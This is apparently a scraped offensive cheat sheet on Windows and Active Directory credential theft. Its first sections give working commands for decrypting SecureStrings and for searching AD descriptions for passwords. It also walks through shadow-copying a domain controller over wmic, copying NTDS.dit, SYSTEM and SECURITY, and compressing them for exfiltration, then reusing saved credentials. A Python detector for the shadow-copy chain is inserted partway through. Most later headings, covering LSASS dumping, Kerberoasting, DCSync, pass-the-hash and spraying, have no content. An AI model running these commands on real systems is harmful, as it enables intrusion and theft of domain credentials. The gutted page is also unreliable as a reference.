Credential Access

The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/

SecureString to Plaintext

$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString; 
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password; 

Passwords in Description

ActiveDirectory Module

Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,Description

Using PowerView.ps1 GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Find-UserField -SearchField Description -SearchTerm "password"

Volume Shadow Creation

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \[shadow_copy_dir]\Windows\NTDS\NTDS.dit [target_folder] & copy \[shadow_copy_dir]\Windows\System32\config\SYSTEM [target_folder] & copy \[shadow_copy_dir]\Windows\System32\config\SECURITY [target_folder]"

# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\[AD_IP_address]\c$\[target_folder]
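The shadow-copy sequence above leaves a recognisable trail in process-creation telemetry. As an added example that is not part of the original page, the following Python detector runs over constructed events shaped like Windows Security event 4688 (parent image, new process image, command line; the `GLOBALROOT\Device\HarddiskVolumeShadowCopyN` path is the standard form a mounted shadow copy takes) and flags, per host, a shadow-copy creation followed by a copy of NTDS.dit out of that shadow copy, noting when the child was spawned by WmiPrvSE.exe as the remote wmic invocation would produce.

```python
import re

# Constructed sample events (not real telemetry), modelled on 4688 fields.
SAMPLE_EVENTS = [
    {"host": "DC01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c vssadmin create shadow /for=C: 2>&1"},
    {"host": "DC01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                r"\Windows\NTDS\NTDS.dit C:\temp"},
    {"host": "DC01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},  # benign: listing, not creating
    {"host": "WS07", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Command-line patterns for the two steps of the NTDS extraction chain.
RULES = [
    ("shadow_copy_created",
     re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds_dit_copied",
     re.compile(r"\bcopy\b.*\\NTDS\\ntds\.dit\b", re.I)),
]


def classify(event):
    """Return the rule names an event matches (empty list if none)."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # 'wmic process call create' runs on the target as a child of
    # WmiPrvSE.exe, so record that as remote-initiated context.
    if hits and event["parent"].lower().endswith("wmiprvse.exe"):
        hits.append("spawned_via_wmi")
    return hits


def find_ntds_theft_chain(events):
    """Per host, report when both shadow creation and an NTDS.dit copy occur."""
    per_host = {}
    for ev in events:
        for hit in classify(ev):
            per_host.setdefault(ev["host"], set()).add(hit)
    required = {"shadow_copy_created", "ntds_dit_copied"}
    return {host: sorted(hits) for host, hits in per_host.items()
            if required <= hits}
```

Shadow creation alone is routine on backup hosts; the chain rule is what keeps the alert precise, while a lone `ntds_dit_copied` hit on a domain controller still deserves a look.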

Stored Credential Enumeration

You can use the cmdkey command or keymgr.dll (requires a GUI) to list stored credentials. The output can then be used with a runas command to authenticate.

Listing saved credentials:

cmdkey /list

Listing saved credentials in a desktop environment:

rundll32.exe keymgr.dll, KRShowKeyMgr

Using saved credentials:

runas /savecred /user:jmith cmd.exe

Dumping LSASS with rundll32.exe

Same behavior that would occur if you right-clicked the process in Task Manager and dumped LSASS manually.

Memory Dump with Get-StorageDiagnosticInfo

Source: https://x.com/0gtweet/status/1440255495797764108 https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2019-ps

Mount VHD, pull SAM

Targeted Kerberoasting with PowerSploit

Dumping NTDS with ntdsutil.exe

DSInternals

DSInternals found here: https://github.com/MichaelGrafnetter/DSInternals

DCSync with Get-ADReplAccount

Credit to @Mastadon.

Extracting from NTDS, SYSTEM, SECURITY

You may have to modify the following registry key:

  • HKLM\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy and set "Enabled" to 0

Extracting NTDS with ntdsutil.exe

Impacket

GetUserSPNs.py

Kerberoasting

GetNPUsers.py

AS-REP Roasting - Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:

secretsdump.py

Using secretsdump to steal credentials.

Extracting Credentials Remotely

Offline NTDS Cracking

Resetting Credentials with smbpasswd.py

Reset a password when you have the credentials but the password has expired. Also useful when you have a hash but no plaintext password.

NetExec

GitHub repo: https://github.com/Pennyw0rth/NetExec

Pass-the-Hash

Because hashes are just as good:

SMB Password Spraying

Switch out usernames/passwords/targets with lists:

Dumping Remote PowerShell History

Extracting Credentials

Relaying to DCSync
